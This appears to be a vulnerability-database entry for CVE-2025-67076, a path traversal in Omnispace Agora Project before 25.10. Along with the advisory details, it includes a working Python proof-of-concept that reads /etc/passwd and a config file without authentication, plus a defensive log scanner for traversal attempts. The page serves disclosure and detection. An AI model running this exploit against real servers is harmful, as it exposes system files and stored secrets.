Security Vulnerability Report
CVE-2025-67076 CVSS 7.5 HIGH

CVE-2025-67076

Published: 2026-01-15 16:16:12
Last Modified: 2026-01-21 14:45:48

Description

A directory traversal vulnerability in Omnispace Agora Project before 25.10 allows unauthenticated attackers to read files on the system via the misc controller and the ExternalGetFile action. Only files with an extension can be read.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weakness: CWE-22 (Path Traversal)

Configurations (Affected Products)

cpe:2.3:a:agora-project:agora-project:*:*:*:*:*:*:*:* - VULNERABLE
Omnispace Agora Project < 25.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-67076 PoC - Directory Traversal in Agora Project
# Target: Omnispace Agora Project < 25.10
# Vulnerability: Unauthenticated file read via ExternalGetFile action


def exploit_agoraTraversal(target_url, filename):
    """
    Exploit directory traversal to read arbitrary files

    Args:
        target_url: Base URL of vulnerable Agora Project instance
        filename: Path to file to read (e.g., ../../../../etc/passwd)

    Returns:
        File contents if successful, None otherwise
    """
    # Construct the vulnerable endpoint
    endpoint = f"{target_url}/misc/ExternalGetFile"

    # Payload with directory traversal
    params = {'fileName': filename}

    try:
        # Send GET request without authentication
        response = requests.get(endpoint, params=params, timeout=10)

        if response.status_code == 200:
            print(f"[+] Successfully read file: {filename}")
            print("-" * 50)
            print(response.text)
            return response.text
        else:
            print(f"[-] Failed to read file. Status: {response.status_code}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return None


# Example usage
if __name__ == "__main__":
    target = "http://target-server.com/agora"

    # Read system files
    print("[*] Reading /etc/passwd...")
    exploit_agoraTraversal(target, "../../../../etc/passwd")

    print("\n[*] Reading configuration file...")
    exploit_agoraTraversal(target, "../../../../var/www/html/config.xml")
```
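Defensive counterpart, added here as an example and not part of the original PoC or of the vendor's code: a small Python log scanner that flags requests to the ExternalGetFile action whose fileName parameter contains traversal sequences, including percent-encoded and double-encoded forms. The access-log lines are constructed, and the /misc/ExternalGetFile?fileName= URL shape is assumed from the PoC above; adjust ENDPOINT_RE if a deployment routes the action differently.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format), not real traffic. The
# /misc/ExternalGetFile?fileName= shape is assumed from the PoC; adjust ENDPOINT_RE if needed.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jan/2026:16:20:01 +0000] "GET /agora/misc/ExternalGetFile?fileName=../../../../etc/passwd HTTP/1.1" 200 1810
203.0.113.5 - - [15/Jan/2026:16:20:02 +0000] "GET /agora/misc/ExternalGetFile?fileName=..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fconfig.xml HTTP/1.1" 200 942
198.51.100.7 - - [15/Jan/2026:16:21:10 +0000] "GET /agora/misc/ExternalGetFile?fileName=reports/q4.pdf HTTP/1.1" 200 55012
198.51.100.9 - - [15/Jan/2026:16:22:00 +0000] "GET /agora/index.php HTTP/1.1" 200 3120
"""

ENDPOINT_RE = re.compile(r"/misc/ExternalGetFile", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ sequences are exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_name):
    """True when the decoded fileName climbs out of its directory via '..' segments."""
    normalized = decode_fully(file_name).replace("\\", "/")
    return any(segment == ".." for segment in normalized.split("/"))

def find_traversal_attempts(log_text):
    """One record per ExternalGetFile request whose fileName contains traversal."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not ENDPOINT_RE.search(url.path):
            continue
        # parse_qs decodes one encoding layer; decode_fully handles deeper nesting
        for name in parse_qs(url.query, keep_blank_values=True).get("fileName", []):
            if is_traversal(name):
                hits.append({"client": line.split()[0],
                             "fileName": decode_fully(name),
                             "status": int(match.group("status"))})
    return hits

if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(f"[!] {hit['client']} requested {hit['fileName']} (HTTP {hit['status']})")
```

A 200 status on a flagged request is the signal that the instance is still unpatched, since 25.10 and later should refuse the traversal.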

References

https://www.agora-project.net (Product)
https://www.helx.io/blog/advisory-agora-project/ (Third Party Advisory)